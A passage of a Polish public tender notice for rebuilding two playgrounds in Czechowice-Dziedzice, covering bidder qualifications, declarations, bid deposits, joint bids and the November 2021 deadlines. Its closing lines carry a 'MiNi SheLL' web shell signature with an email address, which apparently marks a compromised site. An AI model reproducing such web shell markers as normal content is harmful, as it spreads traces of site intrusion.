w<br/>zakresie kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej min. w<br/>ograniczonym zakresie.<br/>dla zadania nr II<br/>• min. (1) jedną osobą zdolną do wykonania zamówienia tj. posiadającą prawo do wykonywania<br/>samodzielnych funkcji technicznych w budownictwie tj. odpowiednie uprawnienia budowlane w<br/>zakresie kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej min. w<br/>ograniczonym zakresie<br/>dla zadania nr I oraz zadania nr II<br/>Wykonawca składając ofertę na więcej niż jedno zadanie zamówienia może na potwierdzenie<br/>spełnienia ww. warunku udziału w postępowaniu może wykazać dysponowanie:<br/>• min. (1) jedną osobą zdolną do wykonania zamówienia tj. posiadającą prawo do wykonywania<br/>samodzielnych funkcji technicznych w budownictwie tj. odpowiednie uprawnienia budowlane w<br/>zakresie kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej min. w<br/>ograniczonym zakresie<br/>lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów,<br/>oraz zrzeszoną/ymi we właściwym samorządzie zawodowym zgodnie z przepisami ustawy z<br/>dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz.<br/>U. z 2019 r. poz. 1117),<br/>lub spełniającą/ymi warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994r. Prawo<br/>budowlane (tekst jednolity Dz. U. z 2020 r. poz. 1333 z późn. zm.). tj. osobą/ami której/ych<br/>odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach<br/>odrębnych lub spełniającą/ymi wymogi o których mowa w art. 20a ustawy z dnia 15.12.2000 r. o<br/>samorządach zawodowych architektów oraz inżynierów budownictwa („świadczenie usług<br/>transgranicznych”). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o<br/>spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania –<br/>zgodnie z Załącznikiem nr 3 do SWZ<br/>2.Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne potwierdzenie, że<br/>Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu. W przypadku<br/>wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie składa każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykonawca, którego oferta zostanie najwyżej oceniona, w celu<br/>wykazania spełniania warunków udziału w postępowaniu (określonych przez Zamawiającego w ust. 3<br/>niniejszego rozdziału SWZ), na podstawie art. 274 ust. 1 ustawy zostanie wezwany do złożenia<br/>następujących podmiotowych środków dowodowych (aktualnych na dzień ich złożenia):<br/>1.1.oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w<br/>art. 125 ust. 1 Ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>Zamawiającego, o których mowa w art. 108 ust. 1 pkt 3-6 Ustawy Pzp.<br/>Wzór oświadczenia stanowi Załącznik nr 7 do SWZ<br/>(W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia składa każdy z<br/>Wykonawców występujących wspólnie);<br/>1.2.w celu wykazania spełniania warunku dot. sytuacji ekonomicznej<br/>dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy<br/>gwarancyjnej tego ubezpieczenia<br/>1.3.w celu wykazania spełniania warunku dot. zdolności technicznej<br/>wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>Wzór wykazu robót budowlanych stanowi załącznik nr 8 do SWZ<br/>Okres, o którym wyżej mowa liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/>1.4.w celu wykazania spełniania warunku dot. zdolności zawodowej<br/>wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami;<br/>Wzór wykazu osób stanowi załącznik nr 9 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych w przedmiotowym postępowaniu <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oświadczenie, o którym mowa w art. 125 ust. 1 Ustawy Pzp, o niepodleganiu wykluczeniu z<br/>postępowania oraz spełnianiu warunków udziału w postępowaniu, W przypadku powoływania się<br/>na zasoby podmiotu trzeciego Wykonawca, w przypadku polegania na zdolnościach<br/>technicznych lub podmiotów udostępniających zasoby, przedstawia wraz z oświadczeniem, o<br/>którym wyżej mowa, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające<br/>brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby . Oświadczenia, że<br/>Wykonawca zapoznał się z warunkami zamówienia i projektowanymi postanowieniami umowy w<br/>sprawie zamówienia, które zostaną wprowadzone do umowy w sprawie zamówienia oraz, że<br/>przyjmuje ich treść bez żadnych zastrzeżeń. Pełnomocnictwo ustanowione do reprezentowania<br/>Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego.<br/>Zobowiązanie podmiotu udostępniającego Wykonawcy zasoby, do oddania do dyspozycji<br/>Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy<br/>środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów (o ile Wykonawca korzysta ze zdolności innych<br/>podmiotów na zasadach określonych w art. 118 Ustawy Pzp).<br/>Zobowiązanie lub inny podmiotowy środek dowodowy w opisywanym zakresie, przekazuje się w<br/>postaci elektronicznej, i opatruje kwalifikowanym podpisem elektronicznym, podpisem zaufanym<br/>lub podpisem osobistym. W przypadku, gdy zobowiązanie (inny podmiotowy środek dowodowy)<br/>zostało wystawione w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się<br/>cyfrowe odwzorowanie tego dokumentu, opatrzone kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego<br/>odwzorowania z dokumentem w postaci papierowej .Oświadczenie składane na podstawie art.<br/>117 ustawy Pzp (Wykonawcy wspólnie ubiegający się o udzielenie zamówienia) składa każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie. Obowiązek złożenia ww. oświadczenia<br/>odnosić należy również do wykonawców, prowadzących działalność w formie spółki cywilnej.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego, w okolicznościach<br/>gdy zamawiający określa warunki udziału w postępowaniu dotyczące uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2<br/>ustawy Pzp lub warunki dotyczące wykształcenia, kwalifikacji zawodowych lub doświadczenia,<br/>zobowiązani są do dołączenia do oferty oświadczenia, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.Oświadczenie to, służy<br/>ustaleniu przez zamawiającego sposobu spełniania warunków udziału w postępowaniu przez<br/>wykonawców, którzy zdecydowali się na wspólne złożenie oferty w postępowaniu, w<br/>okolicznościach w których przepisy ustawy Pzp wymagają, aby wykonawcy działający wspólnie<br/>wykonali osobiście tę część zamówienia, w odniesieniu do której wykazują wymagane przez<br/>zamawiającego zdolności lub uprawnienia. Z treści art. 117 ust. 2 i 3 ustawy Pzp, wynika<br/>bowiem, iż wykonawcy działający wspólnie mogą wykazać spełnianie warunku dotyczącego<br/>uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jeżeli co<br/>najmniej jeden z nich posiada te uprawnienia i zrealizuje roboty budowlane, dostawy lub usługi,<br/>do których wykonania uprawnienia te są wymagane. W odniesieniu natomiast do warunków<br/>dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy działający<br/>wspólnie, mogą polegać na zdolnościach tych z wykonawców, którzy posiadają wymagane<br/>zdolności i faktycznie wykonają roboty budowlane lub usługi. Wniesienie Wadium. Tabela elementów rozliczeniowych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca winien wnieść wadium przed upływem terminu składania ofert w wysokości:<br/>dla zadania nr I 1 000,00 zł (słownie: jeden tysiąc złotych 00/100);<br/>dla zadania nr II 800,00 zł (słownie: osiemset złotych 00/100)<br/>W przypadku składania oferty na oba zadania zaleca się aby wadium zostało wniesione na<br/>każde zadanie z osobna. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – nie dotyczy spółki<br/>cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z<br/>dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani się złożyć wraz z<br/>ofertą stosowne pełnomocnictwo – (nie dotyczy spółki cywilnej, o ile<br/>upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do<br/>oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę).<br/>Pełnomocnictwo, może wynikać albo z dokumentu pod taką samą nazwą, albo z umowy<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich<br/>Wykonawców występujących wspólnie (przez każdego z Wykonawców lub upoważnionego<br/>pełnomocnika).<br/>5. W przypadku wspólnego ubiegania się o udzielenie zamówienie przez Wykonawców oświadczenie, o którym mowa w art. 125 ustawy (rozdział XVI SWZ) składa każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają<br/>spełnianie warunków udziału w postępowaniu w zakresie, w którym Wykonawca wspólnie<br/>ubiegający się o udzielenie zamówienia wykazuje spełnianie warunków udziału w postępowaniu,<br/>oraz brak podstaw wykluczenia - każdy z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ<br/>podstawy wykluczenia. Powyższe oznacza, iż:<br/>5.1. Oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia;<br/>5.2. Oświadczenie o spełnianiu warunków udziału składa podmiot, który w odniesieniu do<br/>danego warunku udziału w postępowaniu potwierdza jego spełnianie; dopuszcza się<br/>oświadczenie złożone łącznie, tj. podpisane przez wszystkie podmioty wspólnie składające<br/>ofertę lub przez pełnomocnika występującego w imieniu wszystkich podmiotów.<br/>6. W przypadku wspólnego ubiegania się o udzielenie zamówienie przez Wykonawców<br/>oświadczenie składane na podstawie art. 117 ustawy Pzp, składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. Obowiązek złożenia ww. oświadczenia odnosić należy<br/>również do wykonawców, prowadzących działalność w formie spółki cywilnej – załącznik nr 6 do<br/>SWZ (dla zadania nr I oraz dla zadania nr II).<br/>7. Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako<br/>pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>8. Zamawiający żąda od Wykonawcy, który polega na zdolnościach technicznych lub<br/>zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby na<br/>zasadach określonych w art. 118 Pzp, przedstawienia podmiotowych środków dowodowych, o<br/>których mowa w Rozdziale XI, dotyczących tych podmiotów, potwierdzających, że nie zachodzą<br/>wobec tych podmiotów podstawy wykluczenia z postępowania. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną<br/>wprowadzone do treści tej umowy, zawiera załącznik nr 13 do SWZ. (dla zadania nr I oraz dla<br/>zadania nr II)<br/>1.1. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy (tzw. zmiany<br/>kontraktowe w oparciu o art. 455 ust. 1 i ust. 2 Ustawy Pzp) w załączniku nr 13 do SWZ (projektowane postanowienia umowy). (dla zadania nr I oraz dla zadania nr II) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-24 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Ofertę należy złożyć za pośrednictwem Platformy przetargowej: https://czechowice-dziedzice.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-24 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.Ofertę należy sporządzić na formularzu oferty lub według takiego samego schematu,<br/>stanowiącego załącznik nr 1 do SWZ (dla zadania nr I oraz dla zadania nr II). Ofertę należy<br/>złożyć pod rygorem nieważności w formie elektronicznej (w postaci elektronicznej opatrzonej<br/>kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym.2.Oferta wraz z załącznikami musi być złożona za<br/>pośrednictwem Platformy przetargowej. Zamawiający zaleca, aby oferta została utworzona w<br/>formacie .pdf oraz podpisana wewnętrznym kwalifikowanym podpisem elektronicznym. W<br/>przypadku zastosowania podpisu zewnętrznego należy pamiętać o obowiązku dołączenia do<br/>pliku stanowiącego ofertę także pliku podpisującego, który generuje się automatycznie podczas<br/>złożenia podpisu.<br/>Ofertę wraz załącznikami sporządza się w postaci elektronicznej, opatrzonej elektronicznym<br/>podpisem kwalifikowanym lub podpisem zaufanym lub podpisem osobistym, w formatach<br/>danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005<br/>r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz.U. z 2020 r. poz.<br/>346, 568, 695, 1517 i 2320), z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy,<br/>z uwzględnieniem rodzaju przekazywanych danych.<br/>TERMIN WYKONANIA ZAMÓWIENIA<br/>Zadanie nr I<br/>Przebudowa placu zabaw na skwerze pomiędzy ul. Stefana Żeromskiego i ul. Hugona Kołłątaja oraz ul. Hutniczej w Czechowicach-Dziedzicach.<br/>Termin rozpoczęcia: od dnia przekazania placu budowy<br/>Termin zakończenia: do 27 grudnia 2021 r.<br/>Zamawiający przekaże Wykonawcy plac budowy do 3 dni od dnia zawarcia umowy<br/>Zadanie nr II<br/>Przebudowa placu zabaw przy ul. Bestwińskiej w Czechowicach-Dziedzicach.<br/>Termin rozpoczęcia: od dnia przekazania placu budowy<br/>Termin zakończenia: do 27 grudnia 2021 r.<br/>Zamawiający przekaże Wykonawcy plac budowy do 3 dni od dnia zawarcia umowy<br/>Szczegółowy opis przedmiotu zamówienia zawierają załączniki do SWZ, tj.:<br/>a) dokumentacja projektowa – załącznik nr 10 do SWZ; (dla zadania nr I oraz dla zadania nr II)<br/>b) specyfikacja techniczna – załącznik nr 11 do SWZ; (dla zadania nr I oraz dla zadania nr II)<br/>c) przedmiar robót – załącznik nr 12 do SWZ; (dla zadania nr I oraz dla zadania nr II)<br/>d) projektowe postanowienia umowy – załącznik nr 13 do SWZ; (dla zadania nr I oraz dla<br/>zadania nr II)<br/>które stanowią integralną część specyfikacji warunków zamówienia.<br/>Wymagania w zakresie zatrudniania przez wykonawcę lub podwykonawcę osób na podstawie<br/>stosunku pracy art. 95 Ustawy Pzp.<br/>1. Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie<br/>umowy o pracę w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (tekst<br/>jednolity: Dz.U. z 2020 r., poz. 1320, ze zmianami) obejmują następujące rodzaje czynności tj.:<br/>- prace związane z robotami obejmującymi roboty nawierzchniowe.<br/>2. Sposób weryfikacji zatrudnienia osób, oraz uprawnienia Zamawiającego w zakresie kontroli<br/>spełniania przez Wykonawcę wymagań związanych z zatrudnieniem osób, o których mowa w<br/>pkt 5.1. powyżej oraz sankcje z tytułu niespełnienia tych wymagań zostały opisane w<br/>projektowanych postanowieniach umownych stanowiącym załącznik do SWZ.<br/>3.Zamawiający nie określa dodatkowych wymagań związanych z zatrudnianiem osób, o których<br/>mowa w art. 96 ust. 2 pkt 2 Ustawy Pzp.<br/>Wykonawca przed zawarciem umowy zobowiązany jest do wniesienia zabezpieczenia<br/>należytego wykonania umowy w wysokości stanowiącej 3% ceny całkowitej podanej w ofercie.

Creat By MiNi SheLL
Email: jattceo@gmail.com